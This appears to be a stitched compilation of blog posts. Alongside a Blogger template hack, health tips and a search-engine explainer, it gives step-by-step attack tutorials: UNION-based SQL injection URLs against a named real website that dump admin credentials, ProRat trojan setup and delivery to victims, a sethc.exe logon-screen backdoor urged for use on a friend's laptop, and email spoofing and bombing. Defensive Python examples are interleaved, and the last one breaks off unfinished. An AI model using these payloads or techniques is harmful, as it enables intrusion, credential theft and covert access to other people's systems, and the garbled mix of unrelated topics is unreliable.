Blogger Auto Read More Hack: Improved With Many Control Options (Read More hack for Blogger, English explanation)

The Blogger auto read more hack is the best hack available for Blogger, and almost every Blogger user applies it. It automatically creates post summaries with thumbnails. We already shared an auto read more hack for Blogger; this time we are sharing an updated one. With it you can control the following options as you wish:

  1. You can add a default thumbnail image for posts that have no image of their own.
  2. You can turn off auto read more for the first few posts.
  3. You can turn read more on or off separately for the home page and for label pages.
Above are some of the features of this new auto read more hack; the script behind it was written by Rilwis. Now let's see how to apply the hack.

How To Add Auto Read More Hack To Blogger?

If you have already added an old read more hack, remove it first.

  1. Go to Blogger Dashboard > Template
  2. Download a copy of your template (a backup in case something goes wrong)
  3. Click Edit HTML
  4. Hit Proceed
  5. Check the Expand Widget Template checkbox
  6. Find the following code in your template


and add the following piece of code just above it:

<script type="text/javascript">
var summaryConf = {
    showImage: true,      // show a thumbnail next to the summary
    imgFloat: 'left',     // float the thumbnail to the left or right of the summary
    imgWidth: 120,        // thumbnail width in pixels
    imgHeight: 90,        // thumbnail height in pixels
    defaultThumb: 'https://lh3.googleusercontent.com/-GRP8IcURRsw/T9MjiNWXUcI/AAAAAAAAB88/QEDpDHxI55o/s1600/no-thumb.jpg',
    words: 65,            // summary length in words when a thumbnail is shown
    wordsNoImg: 80,       // summary length in words when there is no thumbnail
    skip: 0,              // number of leading posts left unsummarized
    showHome: true,       // apply auto read more on the home page
    showLabel: true       // apply auto read more on label pages
};
</script>
<script type="text/javascript" src="http://code.helperblogger.com/summary.min.js"></script>

You can easily customize the highlighted values above; their meanings are listed below:

  • showImage: true, If you don't want to show an image thumbnail, simply replace true with false.
  • imgFloat: 'left', If you want to float the image to the right of the summary, simply replace left with right.
  • imgWidth: 120, This is the width of the image.
  • imgHeight: 90, This is the height of the image.
  • defaultThumb: 'https://lh3.googleusercontent.com/-GRP8IcURRsw/T9MjiNWXUcI/AAAAAAAAB88/QEDpDHxI55o/s1600/no-thumb.jpg', If you want to set your own default thumbnail, replace this image URL with yours.
  • words: 65, This is the number of words shown when there is a thumbnail.
  • wordsNoImg: 80, This is the number of words shown when there is no thumbnail.
  • skip: 0, Skip the first few posts, i.e. don't apply auto read more to them. If this option is set to 0, auto read more is applied to all posts.
  • showHome and showLabel: Whether to apply auto read more on the home page and on label pages. true allows it, false does not.
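To make the effect of each option concrete, here is an added Python model of the summary logic described above (it is not the summary.min.js script itself, whose source is not on this page). The SummaryConf names are the hack's option names; the image URL in it is a placeholder, and the page-type strings "home", "label" and "item" are assumptions used only by this example.

```python
import html
import re
from dataclasses import dataclass
from typing import Optional


# The same keys as the hack's summaryConf object, with the article's default values.
# defaultThumb is a placeholder URL, not the original image link.
@dataclass
class SummaryConf:
    showImage: bool = True
    imgFloat: str = "left"
    imgWidth: int = 120
    imgHeight: int = 90
    defaultThumb: str = "https://example.invalid/no-thumb.jpg"
    words: int = 65
    wordsNoImg: int = 80
    skip: int = 0
    showHome: bool = True
    showLabel: bool = True


IMG_SRC_RE = re.compile(r"<img[^>]+src=[\"']([^\"']+)[\"']", re.IGNORECASE)
TAG_RE = re.compile(r"<[^>]+>")


def strip_tags(post_html: str) -> str:
    """Reduce the post body to plain text so no markup from the post lands in the summary."""
    return " ".join(TAG_RE.sub(" ", post_html).split())


def summarize(post_html: str, conf: SummaryConf, page_type: str, post_index: int) -> Optional[str]:
    """Summary HTML for one post, or None when the post is shown in full.

    page_type is "home", "label" or "item"; post_index counts posts on the page from 0,
    so the first `skip` posts keep their full body.
    """
    if page_type == "home" and not conf.showHome:
        return None
    if page_type == "label" and not conf.showLabel:
        return None
    if page_type not in ("home", "label"):
        return None                      # single-post (item) pages are never summarized
    if post_index < conf.skip:
        return None
    match = IMG_SRC_RE.search(post_html)
    img_src = match.group(1) if match else conf.defaultThumb
    has_thumb = conf.showImage and bool(img_src)
    limit = conf.words if has_thumb else conf.wordsNoImg
    words = strip_tags(post_html).split()
    snippet = " ".join(words[:limit]) + ("..." if len(words) > limit else "")
    if not has_thumb:
        return snippet
    # The src comes from post content, so it is escaped before being placed in an attribute.
    thumb = (f'<img src="{html.escape(img_src, quote=True)}" width="{conf.imgWidth}" '
             f'height="{conf.imgHeight}" style="float:{conf.imgFloat};margin-right:10px">')
    return thumb + snippet


if __name__ == "__main__":
    conf = SummaryConf(words=5, skip=1)
    post = "<p>one two three four five six seven eight</p>"
    print(summarize(post, conf, "home", 0))   # None: first post is skipped
    print(summarize(post, conf, "home", 1))   # thumbnail (default image) + 5 words + "..."
```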

Now find the following code in your template:


and replace it with the code below:

<span expr:id='data:post.id'><data:post.body/></span>
<b:if cond='data:blog.pageType == "index"'>
<script type='text/javascript'>summary("<data:post.id/>")</script>
<span style='float:right;padding-top:20px;'><a expr:href='data:post.url'>Read More</a></span>
</b:if>
<b:if cond='data:blog.pageType == "archive"'>
<script type='text/javascript'>summary("<data:post.id/>")</script>
</b:if>

Finally, preview your template. If you think everything is all right, save the template; if not, customize it as you wish and then save it :)


What are the ways to prevent hemorrhoids?

The best way to prevent them is to keep the stool soft so that it can pass easily.

To prevent hemorrhoids, or to ease their symptoms, the following measures are recommended:

Eat foods rich in dietary fiber
Drink plenty of fluids
Consider taking dietary fiber as a food supplement (Food additives)
Avoid heavy straining
Go to the toilet as soon as you feel the urge (do not hold it in)
Exercise
Avoid standing or sitting for long periods


How does Google Search work?

Google is undoubtedly the most widely used search engine. It was founded by Larry Page and Sergey Brin. We should know the basic working and methodology of the Google search engine. I have explained it in very simple words; read carefully.

Overview:

Okay, let's assume you want to design a little search engine that searches for the requested keywords in a few websites (say 5 websites). What would our approach be? First of all, we store the contents, that is the web pages, of those 5 websites in our database. Then we build an index of the important parts of these web pages, like titles, headings, meta tags etc. Then we make a simple search box where users can enter a search query or keyword. The user's query is processed to match the keywords in the index and the results are returned accordingly. We return the user a list of links to the actual websites, ordered by some ranking algorithm. I hope the basic overview of how a search engine works is clear to you.

Now read on for more detail.

A web search engine basically works in the following manner. There are three parts:

1. Web Crawling
2. Indexing
3. Query processing or searching

1. The first step is web crawling. A web crawler, or web spider, is software that travels across the World Wide Web and downloads and saves web pages. A crawler is fed with the URLs of websites and starts from there, downloading and saving the web pages associated with those websites. Want to get a feel for a crawler? Download one from here, feed it links to websites and it will start downloading the web pages, images etc. associated with them. Google's web crawler is called Googlebot. Want to see the copies of web pages saved in Google's database? (Not exactly, but close.)
Let's take any website as an example, say www.wikipedia.org, and do this:
Go to Google and search for 'wikipedia'; hopefully you get this link on top.
Click on the 'Cached' link.

Or directly search for 'cache:wikipedia.org'.

Then read the lines at the top of the page you get and things will be clear to you.

2. After Googlebot has saved the pages, it submits them to the Google indexer. Indexing means extracting the words from titles, headings, meta tags etc. The indexed pages are stored in the Google index database. The contents of the index database are similar to the index at the back of a book. Google ignores common or insignificant words like as, for, the, is, or, on (called stop words), which occur in nearly every web page. Indexing is done mainly to improve the speed of searching.

3. The third part is query processing, or searching. It includes the search box where we enter the search query or keyword we are looking for. When the user enters a search query, Google matches the entered keywords against the pages saved in the index database and returns the actual links of the web pages from which those entries were retrieved. Priority is obviously given to the best matching results. Google uses a patented algorithm called PageRank to rank the web pages that match a given search string.

The above three steps are followed not only by Google but by most web search engines. Of course there are many variations, but the methodology is the same.

What is robots.txt?
Web administrators do not want web crawlers (web spiders) to fetch every page or file of a website and show links to them in search results. Robots.txt is a simple text file placed in the top-level directory of the website which lists the paths that web administrators do not want crawlers to fetch. The first thing a well-behaved web crawler does is check the contents of robots.txt. Note that it is a request, not an access control: a crawler that ignores it can still fetch the listed files, so it must never be relied on to hide sensitive content.

Example of the contents of robots.txt ('#' starts a comment):
User-agent: *                        # applies to the web crawlers of all search engines
Disallow: /directory_name/file_name  # a particular file in a particular directory
Disallow: /directory_name/           # all files in a particular directory

You can view the robots.txt of any website (if it exists), for example http://www.microsoft.com/robots.txt
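The three steps above (crawl, index, query) and the robots.txt check are small enough to model end to end. The following is an added Python example, not Google's code and not any real crawler: the site, its robots.txt and the stop-word list are constructed for the example, only titles and h1 headings are indexed as the article describes, and ranking (PageRank) is left out.

```python
import re

# Constructed mini web site: path -> HTML. /private/ is what the site owner wants kept out.
SITE = {
    "/index.html": "<html><title>Explore Hacking blog</title><h1>Welcome to the blog</h1></html>",
    "/sqli.html": "<html><title>SQL injection basics</title><h1>The basics of SQL</h1></html>",
    "/private/notes.html": "<html><title>SQL private notes</title></html>",
}
ROBOTS_TXT = "User-agent: *   # all crawlers\nDisallow: /private/\n"

# The insignificant words the article says are ignored, plus a few more of the same kind.
STOP_WORDS = {"as", "for", "the", "is", "or", "on", "a", "an", "and", "of", "to", "in"}
WORD_RE = re.compile(r"[a-z0-9]+")
TITLE_HEADING_RE = re.compile(r"<(?:title|h1)[^>]*>(.*?)</(?:title|h1)>", re.I | re.S)


def parse_robots(text: str) -> dict:
    """Return {user-agent (lowercase): [disallowed path prefixes]} from User-agent/Disallow lines."""
    rules, agents, in_rules = {}, [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # '#' starts a comment
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if in_rules:                              # a new group starts after Disallow lines
                agents, in_rules = [], False
            agents.append(value.lower())
            rules.setdefault(value.lower(), [])
        elif field == "disallow" and agents:
            in_rules = True
            if value:                                 # an empty Disallow allows everything
                for agent in agents:
                    rules[agent].append(value)
    return rules


def is_allowed(rules: dict, user_agent: str, path: str) -> bool:
    """A group for the exact agent wins over the '*' group; Disallow values are path prefixes."""
    prefixes = rules.get(user_agent.lower(), rules.get("*", []))
    return not any(path.startswith(prefix) for prefix in prefixes)


def crawl(site: dict, robots_txt: str, user_agent: str = "Googlebot") -> dict:
    """Step 1: fetch every page the site's robots.txt allows this crawler to fetch."""
    rules = parse_robots(robots_txt)
    return {path: page for path, page in site.items() if is_allowed(rules, user_agent, path)}


def build_index(pages: dict) -> dict:
    """Step 2: inverted index word -> set of paths, from titles and headings, stop words dropped."""
    index = {}
    for path, page in pages.items():
        text = " ".join(TITLE_HEADING_RE.findall(page)).lower()
        for word in WORD_RE.findall(text):
            if word not in STOP_WORDS:
                index.setdefault(word, set()).add(path)
    return index


def search(index: dict, query: str) -> list:
    """Step 3: pages containing every significant query term (ranking is out of scope here)."""
    terms = [w for w in WORD_RE.findall(query.lower()) if w not in STOP_WORDS]
    if not terms:
        return []
    hits = set.intersection(*(index.get(term, set()) for term in terms))
    return sorted(hits)


if __name__ == "__main__":
    pages = crawl(SITE, ROBOTS_TXT)
    index = build_index(pages)
    print(sorted(pages))                       # ['/index.html', '/sqli.html']
    print(search(index, "the SQL basics"))     # ['/sqli.html']
    print(search(index, "private notes"))      # []  (never crawled, so never indexed)
```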

SQL Injection | Step by Step deface website

What is SQL injection?
SQL stands for Structured Query Language. It is a very high level language, meaning it is close to human language. Queries like SELECT, INSERT, DELETE and UPDATE are used to select, add, delete and update data respectively. SQL is used to design databases, and the information is stored in databases.
SQL injection is a vulnerability in the database layer of an application which allows an attacker to see the contents stored in the database. This vulnerability occurs when the user's input is not filtered, or is improperly filtered. Take, for example, web page links of the form
www.anything.com/something.php?something=something, for example
Here we are passing 130 to the database and it returns the results accordingly. Let's attach a single quote (') at the end, that is
and we get an error on the screen because the single quote (') was included while processing the results. This assures us that our input was not filtered and the page is vulnerable to attack.

Some basics:
Every database server has databases on it. Every database has tables in it, tables have columns, and finally the data is stored in the columns.

We have chosen the database "explore_hacking" from six databases. It has four tables: admin, articles, products and subscribers. Each table has further columns with data stored in them. For example, the 'admin' table has the columns id, username, password and email.

What is information_schema?
It is an information database present by default in all MySQL database servers (version 5 and above). It contains information such as the names of the tables and columns present in all the other databases.

We have opened the database "information_schema", which is present by default, and the table named "TABLES" in that database.

SQL Injection Tutorial:
This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send queries through the URL and get the results back on screen accordingly. The motive is to get the name of the table and the names of the columns in which usernames and passwords are stored, and finally to fetch them.

Step 1. Find the number of columns.
Let's use the "ORDER BY" clause here; it is used to sort the result by a column. Choose any number, say 10. Here I have assumed that the number of columns can't be more than 10. "--" turns everything after it into a comment.
Now go to this URL:
http://www.tartanarmy.com/news/news.php?id=130 order by 10--
Actually we instructed it to sort the result by the 10th column, but it returned an error; this means the number of columns is less than 10. Let's replace it with 9.

http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This means the number of columns is less than 9. We keep going like this until we don't get any error.
Finally we reach '6':
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
We didn't get any error, which means there are 6 columns.

Step 2. Find the vulnerable columns.
Now let's use the "UNION ALL" and "SELECT" commands. Remember to put a dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--
We get a couple of numbers on screen. The ones shown in bold are the most vulnerable columns.
In this case the most vulnerable is number 2.

Step 3. Find the database version.
Replace the most vulnerable column with "@@version" or "version()" (if the first one doesn't work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6--
We got the version on screen. It is. The only thing to note is that the version is 5 point something, that is, greater than 5. We would have had to follow some other approach if the version were less than 5, because in versions below 5 there is no default database like "information_schema" that stores information about the tables and columns of the other databases.

Step 4. Finding table names.
Replace the vulnerable column number with "table_name".
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from
information_schema.tables where table_schema=database()--
We got the first table name on the screen.
To get all the tables, use group_concat:
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--

Step 5. Finding column names.
Similarly, get all the columns by simply replacing 'table' with 'column':
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from
information_schema.columns where table_schema=database()--
There is a repeating element, in this case 'id'. From it we can work out which table has which columns.

Step 6. Fetching data from columns.
We can fetch the data stored in any column, but the interesting ones here are username and password.
These columns are in the first table, that is tar_admin. "0x3a" is the hex code of a colon and is used simply to insert a colon into the result as a separator.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--

So finally we got the usernames and passwords on screen. But the passwords are hashed.
Most of these hashes are crackable. Let's choose any username, say
"Sneds". The password in hashed form is 7d372d3f4ad3116c9e455b20e946dd15. Let's log on to http://md5crack.com/crackmd5.php and put the hashed (encrypted) password there.
It cracks it for us. We get 'oorwullie' as the result (the password in clear text).

Note: Hashes are a type of one-way encryption which is irreversible. There are numberless online crackers available. Keep trying. Sometimes very strong hashes cannot be cracked.
Where is the login panel or login page of the website?
So you got the key; where is the lock? Most websites have their login pages at default locations.
For any website, say www.xyz.com, the login page would be at
www.xyz.com/admin, www.xyz.com/administrator, www.xyz.com/adminlogin etc.
Download this admin page finder from here and it will try all these default pages.

So now you know how deadly it can be to let users send their input without any filtering or validation. So never be lazy when programming, and use every possible filtering mechanism.

Trojan Horse | RAT | Configure and Use | Tutorial- Part 2

First go through Part 1, which covers the basics of trojans. This tutorial is about configuring and using a trojan. There are many trojans available on the internet for free. Some popular ones are Beast, ProRat, NetBus, Back Orifice, Girlfriend and Sub7. I will be using ProRat in this tutorial.


1. ProRat - download it from here.
2. Hostname - Your IP address is probably dynamic, that is, it changes every time you disconnect and reconnect. You need a hostname which automatically keeps pointing to your changing IP. Follow these steps:

1. Log on to www.no-ip.com and register for an account.
2. Go to Hosts/Redirects -> Add Host and choose any free available hostname. Do not change any other option; simply click on Create Host.
3. Download and install their DNS update client, available at http://www.no-ip.com/downloads.php. Run it and enter your credentials. Update your hostname and save it.
4. Let's check whether your IP has been associated with the chosen hostname. Go to the command prompt and type 'ping yourhostname' (without quotes); hopefully it replies with your IP address.

Tutorial for configuring the trojan:

1. Open the prorat.exe that you downloaded.
2. Click on Create and then Create ProRat Server.

3. Enter your hostname in the ProRat Notification field. Uncheck all other options.
4. Click on the General Settings tab and have a look at the server port, password and victim name. Remember these. Check out and configure the other options as per your needs. You can bind server.exe with any genuine file, change its icon etc.
5. Finally click on Create Server and it is ready to be sent to the victim. Once the victim installs it, it automatically disables the antivirus/firewall.

Modes of sending:
You might be thinking of sending this server.exe to the victim as an email attachment, but unfortunately you can't do so. The better option is to upload it to an uploading site like mediafire.com and give the download link to the victim.

What happens after the victim has run the server part?

1. Click on the ProConnective tab and start listening for connections. Allow it through the firewall if it asks you to open a port.
2. You will start listening for connections; I mean you will get a notification when the victim comes online.

Note: If you know the victim is online and it still isn't picking up any connections, trace the victim's IP, enter it in the IP field and hit Connect. But this only works if he is not behind any network and is directly connected to the internet. If you don't know how to trace an IP, mention it in the comments.

What happens after a successful connection?
After you have managed to connect to the victim's machine, there are numberless interesting things to do. I leave this part to you. Have fun.

How to make it undetectable by antivirus?
There isn't any hard and fast way to make it fully undetectable by all antiviruses. The real way to do it is to modify the source code of the open source trojans available. It is a very challenging job. There are many crypters which claim to make it undetectable, but unfortunately hardly one in every hundred works. I will try to write the next article on this.

Countermeasures against trojans:
The obvious countermeasure against trojans is to not accept download links blindly. Keep your antivirus up to date.

Detecting and removing a trojan:
A trojan, once installed, is very hard to remove. It hides itself from the Task Manager. Install Process Explorer and it will hopefully show you all running processes, including the trojan. Kill the process and remove it. Another good thing is to carefully check the open ports and running services with the 'netstat' command. Anyway, the best option is to reinstall Windows.

Setting Backdoor in Windows | Command Prompt On Logon Screen

Let's assume that you have just cracked the victim's Windows password, or simply got access to his Windows for some time. Can you make some changes in Windows so that you could access it again even if the victim changes the password? Or can you make changes in your own Windows so that you could access it anytime even if anybody sets or changes the password?
Simply put: can we set a backdoor in Windows?
Yes we can :)
A backdoor actually means maintaining access.
Okay, let's do one thing first. Open your command prompt (run as administrator on Windows 7/Vista).

Type the following command:

Syntax: net user account.name *
Example: net user administrator *
and hit Enter. Set any password for that account.

Hopefully your new password has been set. Did you notice one thing? It didn't ask you to confirm the old password. Now suppose we somehow manage to access the command prompt at the logon screen (without logging in): we could easily change or clear the password.
Okay, let's move on.
Now press the Shift key five times and you should get a "Sticky Keys" dialog box on screen.

Sticky Keys is a feature that makes it easy for users with physical disabilities to press multiple keys at a time. This is the only feature which can be used before logging in, at the logon screen (as far as I know). I repeat: this feature can be used at the logon screen by pressing the Shift key five times.
Whenever we start an application like Paint, we are actually running mspaint.exe from C:\windows\system32; for the command prompt we are running cmd.exe from the system32 directory. Similarly,
when we press Shift five times or use the Sticky Keys feature, the system actually starts the executable file
sethc.exe from the system32 directory. This means that if we rename cmd.exe to sethc.exe and press Shift five times, the system again starts sethc.exe, but instead of Sticky Keys the command prompt opens.
But you can't simply rename it or change system32 files. Follow the tutorial for that.

Tutorial:

* Go to C:\windows\system32
* Copy cmd.exe to your desktop and rename it to sethc.exe.
* Now copy that file and paste it back into the system32 directory.

@ Windows XP users

Hopefully the existing original sethc.exe has been replaced and your job is done. Now press Shift five times and you will see the command prompt on screen. You can access the command prompt at the Windows logon screen and change or clear the password easily using the "net user" command.

Note: You can also make these changes while using the Windows Guest account. But when you access the command prompt at the logon screen, you can change or clear the password even of the administrator's account. This is exactly how we can break into the administrator's account through the Guest account.

@ Windows Vista/7 users

You will have got a pop-up box saying "Access Denied".

Actually you cannot change files in the system32 directory until you have the permissions, and you cannot have the permissions until you have ownership. So let's take ownership and change the permissions; just follow the steps.

1. Right click on sethc.exe and run as administrator. Again right click on sethc.exe and open Properties.
Click on the Advanced tab, then on Owner, click Edit, change the owner from "TrustedInstaller" to "Administrator" and click Apply.

2. Then click on 'Edit' in the Security tab to edit the permissions. Click on 'Administrators', give it Full Control
and apply the changes.

Okay, it's done now.

Now try replacing the original sethc.exe with our sethc.exe (obtained by renaming cmd.exe).
Press the Shift key five times and hopefully you get the command prompt on the screen instead of Sticky Keys.

Enjoy the command prompt at the logon screen...

So do not forget to set this backdoor whenever you get a friend's laptop for a few minutes... :)
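Because the replacement leaves sethc.exe byte-for-byte identical to cmd.exe, the backdoor is easy to audit for. The following is an added Python check, not part of the original article: it hashes the accessibility binaries in a System32 directory and reports any that equal a shell. It generalizes from the page's sethc.exe/cmd.exe pair to the other logon-screen accessibility binaries and to powershell.exe; the make_demo_system32 helper builds a throwaway directory of constructed placeholder files so the check can be exercised without touching a real system.

```python
import hashlib
import os
import tempfile

# Binaries Windows launches from the logon screen. The article covers sethc.exe; the others are
# the usual accessibility helpers that can be swapped the same way.
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe")
SHELLS = ("cmd.exe", "powershell.exe")


def sha256_of(path: str) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hijack_indicators(system32_dir: str) -> list:
    """Report accessibility binaries whose contents equal a shell binary in the same directory."""
    shell_hashes = {}
    for shell in SHELLS:
        path = os.path.join(system32_dir, shell)
        if os.path.isfile(path):
            shell_hashes[sha256_of(path)] = shell
    findings = []
    for name in ACCESSIBILITY_BINARIES:
        path = os.path.join(system32_dir, name)
        if not os.path.isfile(path):
            continue
        shell = shell_hashes.get(sha256_of(path))
        if shell:
            findings.append(f"{name} is byte-identical to {shell}")
    return findings


def make_demo_system32(hijacked: bool) -> str:
    """Build a throwaway directory of constructed placeholder files (not real executables)."""
    tmp = tempfile.mkdtemp(prefix="fake_system32_")
    cmd_bytes = b"MZ placeholder for cmd.exe"
    with open(os.path.join(tmp, "cmd.exe"), "wb") as fh:
        fh.write(cmd_bytes)
    with open(os.path.join(tmp, "sethc.exe"), "wb") as fh:
        fh.write(cmd_bytes if hijacked else b"MZ placeholder for sethc.exe")
    return tmp


if __name__ == "__main__":
    print(hijack_indicators(make_demo_system32(hijacked=False)))  # []
    print(hijack_indicators(make_demo_system32(hijacked=True)))   # ['sethc.exe is byte-identical to cmd.exe']
    print(hijack_indicators(r"C:\Windows\System32"))              # the real check on a Windows host
```

A clean system should produce an empty list; on Windows the last line performs the check against the real directory.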

SQL INJECTION | Website Deface | Using tool | Live Example

What is SQL injection?
SQL stands for Structured Query Language. SQL is used to design databases, and the information is stored in databases. SQL injection is a vulnerability in the database layer of an application which allows an attacker to see the contents stored in the database. This vulnerability occurs when the user's input is not filtered, or is improperly filtered.

The main goal of the attacker is to access the information stored in the website's database. It can be done manually; read more here. In this tutorial I am going to do the same thing more easily using a tool.

Read the disclaimer first before proceeding. I remind you again that this is only for educational purposes.

Requirement: Download the tool from here. It is SqliHelper V.2.1.

Steps of the attack:

Vulnerable Website > Database > Tables > Columns > Data

Search for any vulnerable website using Google dorks. I found this website.
I came to know it was vulnerable because when I attached a single quote at the end, it didn't filter it and returned an error.


Step 1: Run the tool; there is no need for any installation. Input the vulnerable URL and click on 'Inject'.

Step 2: After processing is done, click on "Get Database". It then shows the databases.

Step 3: Select any database other than "information_schema" and click on "Get Tables". It starts fetching all the tables; have some patience. In most cases there is a table like admin, login or users.

Step 4: Select any table and click on "Get Columns".

Step 5: Select the column and click on "Dump Now". A new pop-up window opens showing you the data stored in it.

So now you know how deadly it can be to let users send their input without any filtering or validation. So never be lazy when programming, and use every possible filtering mechanism.
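Both SQL injection articles above (the manual walkthrough against news.php?id=130 and this tool-based one) end with the same advice: validate and filter input. The following is an added Python example, not the site's PHP and not the tool, that puts the vulnerable pattern and its fix side by side on a constructed SQLite database: news_vulnerable pastes the id parameter into the query like the page described, so the single-quote and ORDER BY probes from the first article produce errors and a UNION returns attacker-chosen columns, while news_safe checks the type and binds the value, so the same inputs are harmlessly rejected. The table layout and column names are assumptions for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's database: one news table with six columns."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT, views INTEGER);
        INSERT INTO news VALUES (130, 'Match report', 'Sample body', 'editor', '2012-06-01', 10);
    """)
    return conn


def news_vulnerable(conn, id_param: str) -> list:
    """The pattern behind news.php?id=...: the URL parameter is pasted straight into the SQL string."""
    sql = "SELECT id, title, body, author, posted, views FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def news_safe(conn, id_param: str) -> list:
    """Hardened form: require an integer, then bind it so it can never be parsed as SQL."""
    try:
        news_id = int(id_param)
    except ValueError:
        return []                        # "130'" or "130 order by 10--" is rejected here
    sql = "SELECT id, title, body, author, posted, views FROM news WHERE id=?"
    return conn.execute(sql, (news_id,)).fetchall()


def probe(conn, handler, id_param: str) -> tuple:
    """Run one request; return ('ok', rows) or ('error', message), as the page would show them."""
    try:
        return ("ok", handler(conn, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    probes = ("130", "130'", "130 order by 10--", "130 order by 6--",
              "-130 union select all 1,2,3,4,5,6--")
    for param in probes:
        print(repr(param))
        print("  vulnerable:", probe(conn, news_vulnerable, param))
        print("  safe:      ", probe(conn, news_safe, param))
```

The ORDER BY probe fails on the vulnerable handler exactly as the first article describes (too many columns gives an error, the right count does not), which is the information the attacker uses; the safe handler gives the same empty answer for every malformed id and leaks nothing.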

Send, identify and trace fake/spoofed email | Email bombing | Email spamming

Basics of how email works (you can skip this part)
Email stands for Electronic Mail. Sending and receiving email is handled by email servers. Email service providers configure an email server before anyone can sign in to an account and start communicating digitally. Users from across the world register with these email servers and set up an email account.

Email travel path:
Let's say we have two email providers, gmail.com and yahoo.com. ABC is a registered user of gmail.com and XYZ is a registered user of yahoo.com.
• ABC signs in to his email account at gmail.com, writes a mail to xyz@yahoo.com and sends the message.
• Behind the curtain, the email from the computer of abc@gmail.com is forwarded to the gmail.com email server. The gmail.com server then looks up yahoo.com on the internet and forwards the email to yahoo.com for the account XYZ@yahoo.com. The Yahoo server puts that email into that account.
• XYZ then sits down at a computer and signs in to her email account. Now she has the message in her inbox.

Sending fake/spoofed email: A fake or spoofed email is an email sent from an arbitrary email ID. It doesn't matter whether the sender's email address really exists or not; the sender's email ID can be anything@anything.com.

Read the disclaimer before proceeding

Methods:

1. Using open relay servers: An open relay server is one which allows anyone to send email by connecting to it. The user connects to it via telnet and instructs the server to send the email. This method is outdated, or simply put, it doesn't work. I won't talk about it more.

2. Using websites: There are numberless websites that provide a free service for sending fake emails. The problem is that they attach advertisements to your email. The best one I have found that does not attach advertisements:

www.emkei.cz (has some advanced options)

3. Using mail sending scripts: PHP contains a mail sending function which allows us to send email with fake headers.
Download a PHP script from here.
We just need to upload the mail sending script to a web hosting site. It doesn't work on every web hosting site, because some have no email sending support. I have tested x10hosting.com (account activation can take up to a day), and it works perfectly. Some others are www.000webhost.com and byethost5.com.

Note: This script contains options for sending spoofed email, spamming and email bombing. Your hosting account might be immediately suspended for spamming/bombing. But it works perfectly if you have your own premium web hosting account. If you want to try the email bomber, I could let you use my own if enough people request it in the comments.

What are email spamming and email bombing?
Email bombing, as is clear from the name, is sending mass emails, that is, a large number of emails to a single email ID in one click. Email spamming is sending an email to a large number of email IDs in one click. These activities are performed mainly to advertise the products or services provided by a company. Many spammers spam to collect individuals' personal information through some stupid trick like 'fill in these details to get your lottery amount', and that information is sold to businesses looking for people of different categories. There could be many more reasons for spamming. Spammers use automated tools to collect as many email addresses as they can from websites, forms and chat rooms, and send spam to them.

How to identify whether an email is real or spoofed?

It can be done by checking the headers. Email headers are simply text containing information about the mail servers that the email passed through on its path from sender to receiver. They contain a lot of other information too.
Note: I am just telling you a few points about this so that you get an idea of the approach. This may or may not hold depending on some factors.

We can view email headers in Gmail by clicking 'Show original', in Yahoo by clicking 'Full headers', and with similar options at other email service providers.

If you get an email displaying the sender's address as someone@gmail.com, someone@hotmail.com or someone@yahoo.com, then it should have originated from the Gmail, Hotmail or Yahoo servers respectively. If it didn't, the email is most probably fake.

I will show you with an example. I received three emails in my Gmail inbox from the sender's address "someone@gmail.com". The sender's address tells me that they should have originated from a Gmail/Google server if they were real.

Note: There is a field called "Return-Path" in the headers. If the email ID shown in this field and the email ID you get as the sender's address don't match, then the email is surely fake.

Can we get the sender's IP address from the email headers?

We may or may not. Gmail and Yahoo normally do not reveal the sender's IP address. But when an email is sent from a PHP script, the headers might reveal the sender's IP. The conclusion is that the answer to this question varies between email service providers and depends on how the email was sent.

Can we trace the sender's location if we get his IP address?

The IP address alone only tells us which Internet Service Provider (ISP) the sender used. Further details cannot be revealed without the help of that ISP. Normally the public IP is dynamic, that is, it keeps changing, so we need to ask the ISP which user was assigned that IP at the time the email was sent. If the sender has purchased a static IP address, it doesn't matter exactly when the email was sent; he can easily be traced.
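The header checks described above (Return-Path versus the visible sender, and whether a gmail.com sender really arrived from a Google server) can be automated. The following is an added Python example, not from the original article: it parses two constructed messages (SPOOFED and GENUINE are made up for the example, with reserved example addresses) and reports each inconsistency. The SENDING_HOSTS mapping of sender domains to the domain of the servers that deliver their mail is an assumption for the three providers the article names.

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed messages, not real mail. SPOOFED claims a gmail.com sender but was injected by a
# PHP script on a hosting box; GENUINE shows the shape of a message that really left Google.
SPOOFED = """\
Return-Path: <www-data@shared-host.example.invalid>
Received: from mail.example.invalid (mail.example.invalid [192.0.2.10])
        by mx.receiver.example.invalid with ESMTP id abc123
Received: from shared-host.example.invalid (localhost [127.0.0.1])
        by mail.example.invalid with ESMTP id def456
From: someone@gmail.com
To: victim@example.invalid
Subject: Test
X-PHP-Originating-Script: 1001:mailer.php

body
"""

GENUINE = """\
Return-Path: <someone@gmail.com>
Received: from mail-x.google.com (mail-x.google.com [203.0.113.5])
        by mx.receiver.example.invalid with ESMTPS id xyz789
From: someone@gmail.com
To: victim@example.invalid
Subject: Test

body
"""

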